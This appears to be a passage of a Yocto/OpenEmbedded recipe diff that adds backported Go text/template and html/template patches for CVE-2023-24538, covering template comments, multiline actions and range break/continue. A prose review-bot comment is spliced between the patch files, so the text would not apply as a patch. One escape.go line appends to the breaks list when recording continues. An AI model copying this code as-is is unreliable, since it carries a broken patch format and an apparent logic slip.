291 func (t *Tree) Parse(text, leftDelim, rightDelim string, treeSet map[string]*Tree, funcs ...map[string]interface{}) (tree *Tree, err error) {
292 defer t.recover(&err)
293 t.ParseName = t.Name
294- t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim), treeSet)
295+ emitComment := t.Mode&ParseComments != 0
296+ t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim, emitComment), treeSet)
297 t.text = text
298 t.parse()
299 t.add()
300@@ -240,12 +250,14 @@ func (t *Tree) add() {
301 }
302 }
303
304-// IsEmptyTree reports whether this tree (node) is empty of everything but space.
305+// IsEmptyTree reports whether this tree (node) is empty of everything but space or comments.
306 func IsEmptyTree(n Node) bool {
307 switch n := n.(type) {
308 case nil:
309 return true
310 case *ActionNode:
311+ case *CommentNode:
312+ return true
313 case *IfNode:
314 case *ListNode:
315 for _, node := range n.Nodes {
316@@ -276,6 +288,7 @@ func (t *Tree) parse() {
317 if t.nextNonSpace().typ == itemDefine {
318 newT := New("definition") // name will be updated once we know it.
319 newT.text = t.text
320+ newT.Mode = t.Mode
321 newT.ParseName = t.ParseName
322 newT.startParse(t.funcs, t.lex, t.treeSet)
323 newT.parseDefinition()
324@@ -331,13 +344,15 @@ func (t *Tree) itemList() (list *ListNode, next Node) {
325 }
326
327 // textOrAction:
328-// text | action
329+// text | comment | action
330 func (t *Tree) textOrAction() Node {
331 switch token := t.nextNonSpace(); token.typ {
332 case itemText:
333 return t.newText(token.pos, token.val)
334 case itemLeftDelim:
335 return t.action()
336+ case itemComment:
337+ return t.newComment(token.pos, token.val)
338 default:
339 t.unexpected(token, "input")
340 }
341@@ -539,6 +554,7 @@ func (t *Tree) blockControl() Node {
342
343 block := New(name) // name will be updated once we know it.
344 block.text = t.text
345+ block.Mode = t.Mode
346 block.ParseName = t.ParseName
347 block.startParse(t.funcs, t.lex, t.treeSet)
348 var end Node
349diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
350index 4e09a78..d9c13c5 100644
351--- a/src/text/template/parse/parse_test.go
352+++ b/src/text/template/parse/parse_test.go
353@@ -348,6 +348,30 @@ func TestParseCopy(t *testing.T) {
354 testParse(true, t)
355 }
356
357+func TestParseWithComments(t *testing.T) {
358+ textFormat = "%q"
359+ defer func() { textFormat = "%s" }()
360+ tests := [...]parseTest{
361+ {"comment", "{{/*\n\n\n*/}}", noError, "{{/*\n\n\n*/}}"},
362+ {"comment trim left", "x \r\n\t{{- /* hi */}}", noError, `"x"{{/* hi */}}`},
363+ {"comment trim right", "{{/* hi */ -}}\n\n\ty", noError, `{{/* hi */}}"y"`},
364+ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x"{{/* */}}"y"`},
365+ }
366+ for _, test := range tests {
367+ t.Run(test.name, func(t *testing.T) {
368+ tr := New(test.name)
369+ tr.Mode = ParseComments
370+ tmpl, err := tr.Parse(test.input, "", "", make(map[string]*Tree))
371+ if err != nil {
372+ t.Errorf("%q: expected error; got none", test.name)
373+ }
374+ if result := tmpl.Root.String(); result != test.result {
375+ t.Errorf("%s=(%q): got\n\t%v\nexpected\n\t%v", test.name, test.input, result, test.result)
376+ }
377+ })
378+ }
379+}
380+
381 type isEmptyTest struct {
382 name string
383 input string
384@@ -358,6 +382,7 @@ var isEmptyTests = []isEmptyTest{
385 {"empty", ``, true},
386 {"nonempty", `hello`, false},
387 {"spaces only", " \t\n \t\n", true},
388+ {"comment only", "{{/* comment */}}", true},
389 {"definition", `{{define "x"}}something{{end}}`, true},
390 {"definitions and space", "{{define `x`}}something{{end}}\n\n{{define `y`}}something{{end}}\n\n", true},
391 {"definitions and text", "{{define `x`}}something{{end}}\nx\n{{define `y`}}something{{end}}\ny\n", false},
392--
3932.7.4
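--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
@@ -0,0 +1,497 @@
+From 760d88497091fb5d6d231a18e6f4e06ecb9af9b2 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 10 Sep 2020 18:53:26 -0400
+Subject: [PATCH 4/6] text/template: allow newlines inside action delimiters
+
+This allows multiline constructs like:
+
+ {{"hello" |
+ printf}}
+
+Now that unclosed actions can span multiple lines,
+track and report the start of the action when reporting errors.
+
+Also clean up a few "unexpected <error message>" to be just "<error message>".
+
+Fixes #29770.
+
+Change-Id: I54c6c016029a8328b7902a4b6d85eab713ec3285
+Reviewed-on: https://go-review.googlesource.com/c/go/+/254257
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #4
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9384d34c58099657bb1b133beaf3ff37ada9b017
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/text/template/doc.go | 21 ++++-----
+ src/text/template/exec_test.go | 2 +-
+ src/text/template/parse/lex.go | 84 +++++++++++++++++------------------
+ src/text/template/parse/lex_test.go | 2 +-
+ src/text/template/parse/parse.go | 59 +++++++++++++-----------
+ src/text/template/parse/parse_test.go | 36 ++++++++++++---
+ 6 files changed, 117 insertions(+), 87 deletions(-)
+
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 4b0efd2..7b30294 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -40,16 +40,17 @@ More intricate examples appear below.
+ Text and spaces
+
+ By default, all text between actions is copied verbatim when the template is
+-executed. For example, the string " items are made of " in the example above appears
+-on standard output when the program is run.
+-
+-However, to aid in formatting template source code, if an action's left delimiter
+-(by default "{{") is followed immediately by a minus sign and ASCII space character
+-("{{- "), all trailing white space is trimmed from the immediately preceding text.
+-Similarly, if the right delimiter ("}}") is preceded by a space and minus sign
+-(" -}}"), all leading white space is trimmed from the immediately following text.
+-In these trim markers, the ASCII space must be present; "{{-3}}" parses as an
+-action containing the number -3.
++executed. For example, the string " items are made of " in the example above
++appears on standard output when the program is run.
++
++However, to aid in formatting template source code, if an action's left
++delimiter (by default "{{") is followed immediately by a minus sign and white
++space, all trailing white space is trimmed from the immediately preceding text.
++Similarly, if the right delimiter ("}}") is preceded by white space and a minus
++sign, all leading white space is trimmed from the immediately following text.
++In these trim markers, the white space must be present:
++"{{- 3}}" is like "{{3}}" but trims the immediately preceding text, while
++"{{-3}}" parses as an action containing the number -3.
+
+ For instance, when executing the template whose source is
+
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index b8a809e..3309b33 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -1295,7 +1295,7 @@ func TestUnterminatedStringError(t *testing.T) {
+ t.Fatal("expected error")
+ }
+ str := err.Error()
+- if !strings.Contains(str, "X:3: unexpected unterminated raw quoted string") {
++ if !strings.Contains(str, "X:3: unterminated raw quoted string") {
+ t.Fatalf("unexpected error: %s", str)
+ }
+ }
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index e41373a..6784071 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -92,15 +92,14 @@ const eof = -1
+ // If the action begins "{{- " rather than "{{", then all space/tab/newlines
+ // preceding the action are trimmed; conversely if it ends " -}}" the
+ // leading spaces are trimmed. This is done entirely in the lexer; the
+-// parser never sees it happen. We require an ASCII space to be
+-// present to avoid ambiguity with things like "{{-3}}". It reads
++// parser never sees it happen. We require an ASCII space (' ', \t, \r, \n)
++// to be present to avoid ambiguity with things like "{{-3}}". It reads
+ // better with the space present anyway. For simplicity, only ASCII
+-// space does the job.
++// does the job.
+ const (
+- spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
+- leftTrimMarker = "- " // Attached to left delimiter, trims trailing spaces from preceding text.
+- rightTrimMarker = " -" // Attached to right delimiter, trims leading spaces from following text.
+- trimMarkerLen = Pos(len(leftTrimMarker))
++ spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
++ trimMarker = '-' // Attached to left/right delimiter, trims trailing spaces from preceding/following text.
++ trimMarkerLen = Pos(1 + 1) // marker plus space before or after
+ )
+
+ // stateFn represents the state of the scanner as a function that returns the next state.
+@@ -108,19 +107,18 @@ type stateFn func(*lexer) stateFn
+
+ // lexer holds the state of the scanner.
+ type lexer struct {
+- name string // the name of the input; used only for error reports
+- input string // the string being scanned
+- leftDelim string // start of action
+- rightDelim string // end of action
+- trimRightDelim string // end of action with trim marker
+- emitComment bool // emit itemComment tokens.
+- pos Pos // current position in the input
+- start Pos // start position of this item
+- width Pos // width of last rune read from input
+- items chan item // channel of scanned items
+- parenDepth int // nesting depth of ( ) exprs
+- line int // 1+number of newlines seen
+- startLine int // start line of this item
++ name string // the name of the input; used only for error reports
++ input string // the string being scanned
++ leftDelim string // start of action
++ rightDelim string // end of action
++ emitComment bool // emit itemComment tokens.
++ pos Pos // current position in the input
++ start Pos // start position of this item
++ width Pos // width of last rune read from input
++ items chan item // channel of scanned items
++ parenDepth int // nesting depth of ( ) exprs
++ line int // 1+number of newlines seen
++ startLine int // start line of this item
+ }
+
+ // next returns the next rune in the input.
+@@ -213,15 +211,14 @@ func lex(name, input, left, right string, emitComment bool) *lexer {
+ right = rightDelim
+ }
+ l := &lexer{
+- name: name,
+- input: input,
+- leftDelim: left,
+- rightDelim: right,
+- trimRightDelim: rightTrimMarker + right,
+- emitComment: emitComment,
+- items: make(chan item),
+- line: 1,
+- startLine: 1,
++ name: name,
++ input: input,
++ leftDelim: left,
++ rightDelim: right,
++ emitComment: emitComment,
++ items: make(chan item),
++ line: 1,
++ startLine: 1,
+ }
+ go l.run()
+ return l
+@@ -251,7 +248,7 @@ func lexText(l *lexer) stateFn {
+ ldn := Pos(len(l.leftDelim))
+ l.pos += Pos(x)
+ trimLength := Pos(0)
+- if strings.HasPrefix(l.input[l.pos+ldn:], leftTrimMarker) {
++ if hasLeftTrimMarker(l.input[l.pos+ldn:]) {
+ trimLength = rightTrimLength(l.input[l.start:l.pos])
+ }
+ l.pos -= trimLength
+@@ -280,7 +277,7 @@ func rightTrimLength(s string) Pos {
+
+ // atRightDelim reports whether the lexer is at a right delimiter, possibly preceded by a trim marker.
+ func (l *lexer) atRightDelim() (delim, trimSpaces bool) {
+- if strings.HasPrefix(l.input[l.pos:], l.trimRightDelim) { // With trim marker.
++ if hasRightTrimMarker(l.input[l.pos:]) && strings.HasPrefix(l.input[l.pos+trimMarkerLen:], l.rightDelim) { // With trim marker.
+ return true, true
+ }
+ if strings.HasPrefix(l.input[l.pos:], l.rightDelim) { // Without trim marker.
+@@ -297,7 +294,7 @@ func leftTrimLength(s string) Pos {
+ // lexLeftDelim scans the left delimiter, which is known to be present, possibly with a trim marker.
+ func lexLeftDelim(l *lexer) stateFn {
+ l.pos += Pos(len(l.leftDelim))
+- trimSpace := strings.HasPrefix(l.input[l.pos:], leftTrimMarker)
++ trimSpace := hasLeftTrimMarker(l.input[l.pos:])
+ afterMarker := Pos(0)
+ if trimSpace {
+ afterMarker = trimMarkerLen
+@@ -342,7 +339,7 @@ func lexComment(l *lexer) stateFn {
+
+ // lexRightDelim scans the right delimiter, which is known to be present, possibly with a trim marker.
+ func lexRightDelim(l *lexer) stateFn {
+- trimSpace := strings.HasPrefix(l.input[l.pos:], rightTrimMarker)
++ trimSpace := hasRightTrimMarker(l.input[l.pos:])
+ if trimSpace {
+ l.pos += trimMarkerLen
+ l.ignore()
+@@ -369,7 +366,7 @@ func lexInsideAction(l *lexer) stateFn {
+ return l.errorf("unclosed left paren")
+ }
+ switch r := l.next(); {
+- case r == eof || isEndOfLine(r):
++ case r == eof:
+ return l.errorf("unclosed action")
+ case isSpace(r):
+ l.backup() // Put space back in case we have " -}}".
+@@ -439,7 +436,7 @@ func lexSpace(l *lexer) stateFn {
+ }
+ // Be careful about a trim-marked closing delimiter, which has a minus
+ // after a space. We know there is a space, so check for the '-' that might follow.
+- if strings.HasPrefix(l.input[l.pos-1:], l.trimRightDelim) {
++ if hasRightTrimMarker(l.input[l.pos-1:]) && strings.HasPrefix(l.input[l.pos-1+trimMarkerLen:], l.rightDelim) {
+ l.backup() // Before the space.
+ if numSpaces == 1 {
+ return lexRightDelim // On the delim, so go right to that.
+@@ -526,7 +523,7 @@ func lexFieldOrVariable(l *lexer, typ itemType) stateFn {
+ // day to implement arithmetic.
+ func (l *lexer) atTerminator() bool {
+ r := l.peek()
+- if isSpace(r) || isEndOfLine(r) {
++ if isSpace(r) {
+ return true
+ }
+ switch r {
+@@ -657,15 +654,18 @@ Loop:
+
+ // isSpace reports whether r is a space character.
+ func isSpace(r rune) bool {
+- return r == ' ' || r == '\t'
+-}
+-
+-// isEndOfLine reports whether r is an end-of-line character.
+-func isEndOfLine(r rune) bool {
+- return r == '\r' || r == '\n'
++ return r == ' ' || r == '\t' || r == '\r' || r == '\n'
+ }
+
+ // isAlphaNumeric reports whether r is an alphabetic, digit, or underscore.
+ func isAlphaNumeric(r rune) bool {
+ return r == '_' || unicode.IsLetter(r) || unicode.IsDigit(r)
+ }
++
++func hasLeftTrimMarker(s string) bool {
++ return len(s) >= 2 && s[0] == trimMarker && isSpace(rune(s[1]))
++}
++
++func hasRightTrimMarker(s string) bool {
++ return len(s) >= 2 && isSpace(rune(s[0])) && s[1] == trimMarker
++}
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index f6d5f28..6510eed 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -323,7 +323,7 @@ var lexTests = []lexTest{
+ tLeft,
+ mkItem(itemError, "unrecognized character in action: U+0001"),
+ }},
+- {"unclosed action", "{{\n}}", []item{
++ {"unclosed action", "{{", []item{
+ tLeft,
+ mkItem(itemError, "unclosed action"),
+ }},
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 496d8bf..5e6e512 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -24,13 +24,14 @@ type Tree struct {
+ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+- funcs []map[string]interface{}
+- lex *lexer
+- token [3]item // three-token lookahead for parser.
+- peekCount int
+- vars []string // variables defined at the moment.
+- treeSet map[string]*Tree
+- mode Mode
++ funcs []map[string]interface{}
++ lex *lexer
++ token [3]item // three-token lookahead for parser.
++ peekCount int
++ vars []string // variables defined at the moment.
++ treeSet map[string]*Tree
++ actionLine int // line of left delim starting action
++ mode Mode
+ }
+
+ // A mode value is a set of flags (or 0). Modes control parser behavior.
+@@ -187,6 +188,16 @@ func (t *Tree) expectOneOf(expected1, expected2 itemType, context string) item {
+
+ // unexpected complains about the token and terminates processing.
+ func (t *Tree) unexpected(token item, context string) {
++ if token.typ == itemError {
++ extra := ""
++ if t.actionLine != 0 && t.actionLine != token.line {
++ extra = fmt.Sprintf(" in action started at %s:%d", t.ParseName, t.actionLine)
++ if strings.HasSuffix(token.val, " action") {
++ extra = extra[len(" in action"):] // avoid "action in action"
++ }
++ }
++ t.errorf("%s%s", token, extra)
++ }
+ t.errorf("unexpected %s in %s", token, context)
+ }
+
+@@ -350,6 +361,8 @@ func (t *Tree) textOrAction() Node {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
++ t.actionLine = token.line
++ defer t.clearActionLine()
+ return t.action()
+ case itemComment:
+ return t.newComment(token.pos, token.val)
+@@ -359,6 +372,10 @@ func (t *Tree) textOrAction() Node {
+ return nil
+ }
+
++func (t *Tree) clearActionLine() {
++ t.actionLine = 0
++}
++
+ // Action:
+ // control
+ // command ("|" command)*
+@@ -384,12 +401,12 @@ func (t *Tree) action() (n Node) {
+ t.backup()
+ token := t.peek()
+ // Do not pop variables; they persist until "end".
+- return t.newAction(token.pos, token.line, t.pipeline("command"))
++ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
+ // Pipeline:
+ // declarations? command ('|' command)*
+-func (t *Tree) pipeline(context string) (pipe *PipeNode) {
++func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+ token := t.peekNonSpace()
+ pipe = t.newPipeline(token.pos, token.line, nil)
+ // Are there declarations or assignments?
+@@ -430,12 +447,9 @@ decls:
+ }
+ for {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemRightDelim, itemRightParen:
++ case end:
+ // At this point, the pipeline is complete
+ t.checkPipeline(pipe, context)
+- if token.typ == itemRightParen {
+- t.backup()
+- }
+ return
+ case itemBool, itemCharConstant, itemComplex, itemDot, itemField, itemIdentifier,
+ itemNumber, itemNil, itemRawString, itemString, itemVariable, itemLeftParen:
+@@ -464,7 +478,7 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ var next Node
+ list, next = t.itemList()
+ switch next.Type() {
+@@ -550,7 +564,7 @@ func (t *Tree) blockControl() Node {
+
+ token := t.nextNonSpace()
+ name := t.parseTemplateName(token, context)
+- pipe := t.pipeline(context)
++ pipe := t.pipeline(context, itemRightDelim)
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
+@@ -580,7 +594,7 @@ func (t *Tree) templateControl() Node {
+ if t.nextNonSpace().typ != itemRightDelim {
+ t.backup()
+ // Do not pop variables; they persist until "end".
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ }
+ return t.newTemplate(token.pos, token.line, name, pipe)
+ }
+@@ -614,13 +628,12 @@ func (t *Tree) command() *CommandNode {
+ switch token := t.next(); token.typ {
+ case itemSpace:
+ continue
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemRightDelim, itemRightParen:
+ t.backup()
+ case itemPipe:
++ // nothing here; break loop below
+ default:
+- t.errorf("unexpected %s in operand", token)
++ t.unexpected(token, "operand")
+ }
+ break
+ }
+@@ -675,8 +688,6 @@ func (t *Tree) operand() Node {
+ // A nil return means the next item is not a term.
+ func (t *Tree) term() Node {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemIdentifier:
+ if !t.hasFunction(token.val) {
+ t.errorf("function %q not defined", token.val)
+@@ -699,11 +710,7 @@ func (t *Tree) term() Node {
+ }
+ return number
+ case itemLeftParen:
+- pipe := t.pipeline("parenthesized pipeline")
+- if token := t.next(); token.typ != itemRightParen {
+- t.errorf("unclosed right paren: unexpected %s", token)
+- }
+- return pipe
++ return t.pipeline("parenthesized pipeline", itemRightParen)
+ case itemString, itemRawString:
+ s, err := strconv.Unquote(token.val)
+ if err != nil {
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index d9c13c5..220f984 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -250,6 +250,13 @@ var parseTests = []parseTest{
+ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x""y"`},
+ {"block definition", `{{block "foo" .}}hello{{end}}`, noError,
+ `{{template "foo" .}}`},
++
++ {"newline in assignment", "{{ $x \n := \n 1 \n }}", noError, "{{$x := 1}}"},
++ {"newline in empty action", "{{\n}}", hasError, "{{\n}}"},
++ {"newline in pipeline", "{{\n\"x\"\n|\nprintf\n}}", noError, `{{"x" | printf}}`},
++ {"newline in comment", "{{/*\nhello\n*/}}", noError, ""},
++ {"newline in comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},
++
+ // Errors.
+ {"unclosed action", "hello{{range", hasError, ""},
+ {"unmatched end", "{{end}}", hasError, ""},
+@@ -426,23 +433,38 @@ var errorTests = []parseTest{
+ // Check line numbers are accurate.
+ {"unclosed1",
+ "line1\n{{",
+- hasError, `unclosed1:2: unexpected unclosed action in command`},
++ hasError, `unclosed1:2: unclosed action`},
+ {"unclosed2",
+ "line1\n{{define `x`}}line2\n{{",
+- hasError, `unclosed2:3: unexpected unclosed action in command`},
++ hasError, `unclosed2:3: unclosed action`},
++ {"unclosed3",
++ "line1\n{{\"x\"\n\"y\"\n",
++ hasError, `unclosed3:4: unclosed action started at unclosed3:2`},
++ {"unclosed4",
++ "{{\n\n\n\n\n",
++ hasError, `unclosed4:6: unclosed action started at unclosed4:1`},
++ {"var1",
++ "line1\n{{\nx\n}}",
++ hasError, `var1:3: function "x" not defined`},
+ // Specific errors.
+ {"function",
+ "{{foo}}",
+ hasError, `function "foo" not defined`},
+- {"comment",
++ {"comment1",
+ "{{/*}}",
+- hasError, `unclosed comment`},
++ hasError, `comment1:1: unclosed comment`},
++ {"comment2",
++ "{{/*\nhello\n}}",
++ hasError, `comment2:1: unclosed comment`},
+ {"lparen",
+ "{{.X (1 2 3}}",
+ hasError, `unclosed left paren`},
+ {"rparen",
+- "{{.X 1 2 3)}}",
+- hasError, `unexpected ")"`},
++ "{{.X 1 2 3 ) }}",
++ hasError, `unexpected ")" in command`},
++ {"rparen2",
++ "{{(.X 1 2 3",
++ hasError, `unclosed action`},
+ {"space",
+ "{{`x`3}}",
+ hasError, `in operand`},
+@@ -488,7 +510,7 @@ var errorTests = []parseTest{
+ hasError, `missing value for parenthesized pipeline`},
+ {"multilinerawstring",
+ "{{ $v := `\n` }} {{",
+- hasError, `multilinerawstring:2: unexpected unclosed action`},
++ hasError, `multilinerawstring:2: unclosed action`},
+ {"rangeundefvar",
+ "{{range $k}}{{end}}",
+ hasError, `undefined variable`},
+--
+2.7.4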
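Review bot: In the parse.go part of this patch, the new `itemError` branch of `Tree.unexpected` calls `t.errorf("%s%s", token, extra)` and then runs straight on to `t.errorf("unexpected %s in %s", token, context)`, which is only correct if errorf never returns; its body is not part of the patch, so a `return` after the first call, or a comment such as `// errorf does not return`, would make the control flow explicit. The new helpers `hasLeftTrimMarker` and `hasRightTrimMarker` at the end of lex.go have no doc comment, unlike `isSpace` and `isAlphaNumeric` beside them; one line each would do, e.g. `// hasLeftTrimMarker reports whether s starts with '-' followed by a space character.` Because this is carried as "Dependency Patch #4" for the CVE fix, the patch header should also say that it changes parser behaviour: a newline inside an action is no longer reported as "unclosed action", and several error strings lose their "unexpected" prefix, as the updated tests show. Two of the added parse tests share the name "newline in comment", so a failure would not identify which input broke.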
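--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
@@ -0,0 +1,585 @@
+From e0e6bca6ddc0e6d9fa3a5b644af9b446924fbf83 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 20 May 2021 12:46:33 -0400
+Subject: [PATCH 5/6] html/template, text/template: implement break and
+ continue for range loops
+
+Break and continue for range loops was accepted as a proposal in June 2017.
+It was implemented in CL 66410 (Oct 2017)
+but then rolled back in CL 92155 (Feb 2018)
+because html/template changes had not been implemented.
+
+This CL reimplements break and continue in text/template
+and then adds support for them in html/template as well.
+
+Fixes #20531.
+
+Change-Id: I05330482a976f1c078b4b49c2287bd9031bb7616
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321491
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #5
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d0dd26a88c019d54f22463daae81e785f5867565
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 4 ++
+ src/html/template/escape.go | 71 ++++++++++++++++++++++++++++++++++-
+ src/html/template/escape_test.go | 24 ++++++++++++
+ src/text/template/doc.go | 8 ++++
+ src/text/template/exec.go | 24 +++++++++++-
+ src/text/template/exec_test.go | 2 +
+ src/text/template/parse/lex.go | 13 ++++++-
+ src/text/template/parse/lex_test.go | 2 +
+ src/text/template/parse/node.go | 36 ++++++++++++++++++
+ src/text/template/parse/parse.go | 42 ++++++++++++++++++++-
+ src/text/template/parse/parse_test.go | 8 ++++
+ 11 files changed, 230 insertions(+), 4 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..aaa7d08 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -6,6 +6,7 @@ package template
+
+ import (
+ "fmt"
++ "text/template/parse"
+ )
+
+ // context describes the state an HTML parser must be in when it reaches the
+@@ -22,6 +23,7 @@ type context struct {
+ jsCtx jsCtx
+ attr attr
+ element element
++ n parse.Node // for range break/continue
+ err *Error
+ }
+
+@@ -141,6 +143,8 @@ const (
+ // stateError is an infectious error state outside any valid
+ // HTML/CSS/JS construct.
+ stateError
++ // stateDead marks unreachable code after a {{break}} or {{continue}}.
++ stateDead
+ )
+
+ // isComment is true for any state that contains content meant for template
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 8739735..6dea79c 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -97,6 +97,15 @@ type escaper struct {
+ actionNodeEdits map[*parse.ActionNode][]string
+ templateNodeEdits map[*parse.TemplateNode]string
+ textNodeEdits map[*parse.TextNode][]byte
++ // rangeContext holds context about the current range loop.
++ rangeContext *rangeContext
++}
++
++// rangeContext holds information about the current range loop.
++type rangeContext struct {
++ outer *rangeContext // outer loop
++ breaks []context // context at each break action
++ continues []context // context at each continue action
+ }
+
+ // makeEscaper creates a blank escaper for the given set.
+@@ -109,6 +118,7 @@ func makeEscaper(n *nameSpace) escaper {
+ map[*parse.ActionNode][]string{},
+ map[*parse.TemplateNode]string{},
+ map[*parse.TextNode][]byte{},
++ nil,
+ }
+ }
+
+@@ -124,8 +134,16 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.BreakNode:
++ c.n = n
++ e.rangeContext.breaks = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.CommentNode:
+ return c
++ case *parse.ContinueNode:
++ c.n = n
++ e.rangeContext.continues = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
+@@ -427,6 +445,12 @@ func join(a, b context, node parse.Node, nodeName string) context {
+ if b.state == stateError {
+ return b
+ }
++ if a.state == stateDead {
++ return b
++ }
++ if b.state == stateDead {
++ return a
++ }
+ if a.eq(b) {
+ return a
+ }
+@@ -466,14 +490,27 @@ func join(a, b context, node parse.Node, nodeName string) context {
+
+ // escapeBranch escapes a branch template node: "if", "range" and "with".
+ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string) context {
++ if nodeName == "range" {
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
++ }
+ c0 := e.escapeList(c, n.List)
+- if nodeName == "range" && c0.state != stateError {
++ if nodeName == "range" {
++ if c0.state != stateError {
++ c0 = joinRange(c0, e.rangeContext)
++ }
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
++
+ // The "true" branch of a "range" node can execute multiple times.
+ // We check that executing n.List once results in the same context
+ // as executing n.List twice.
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
+ c1, _ := e.escapeListConditionally(c0, n.List, nil)
+ c0 = join(c0, c1, n, nodeName)
+ if c0.state == stateError {
++ e.rangeContext = e.rangeContext.outer
+ // Make clear that this is a problem on loop re-entry
+ // since developers tend to overlook that branch when
+ // debugging templates.
+@@ -481,11 +518,39 @@ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string)
+ c0.err.Description = "on range loop re-entry: " + c0.err.Description
+ return c0
+ }
++ c0 = joinRange(c0, e.rangeContext)
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
+ }
+ c1 := e.escapeList(c, n.ElseList)
+ return join(c0, c1, n, nodeName)
+ }
+
++func joinRange(c0 context, rc *rangeContext) context {
++ // Merge contexts at break and continue statements into overall body context.
++ // In theory we could treat breaks differently from continues, but for now it is
++ // enough to treat them both as going back to the start of the loop (which may then stop).
++ for _, c := range rc.breaks {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.BreakNode).Line
++ c0.err.Description = "at range loop break: " + c0.err.Description
++ return c0
++ }
++ }
++ for _, c := range rc.continues {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.ContinueNode).Line
++ c0.err.Description = "at range loop continue: " + c0.err.Description
++ return c0
++ }
++ }
++ return c0
++}
++
+ // escapeList escapes a list template node.
+ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ if n == nil {
+@@ -493,6 +558,9 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ }
+ for _, m := range n.Nodes {
+ c = e.escape(c, m)
++ if c.state == stateDead {
++ break
++ }
+ }
+ return c
+ }
+@@ -503,6 +571,7 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ // which is the same as whether e was updated.
+ func (e *escaper) escapeListConditionally(c context, n *parse.ListNode, filter func(*escaper, context) bool) (context, bool) {
+ e1 := makeEscaper(e.ns)
++ e1.rangeContext = e.rangeContext
+ // Make type inferences available to f.
+ for k, v := range e.output {
+ e1.output[k] = v
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index c709660..fa2b84a 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
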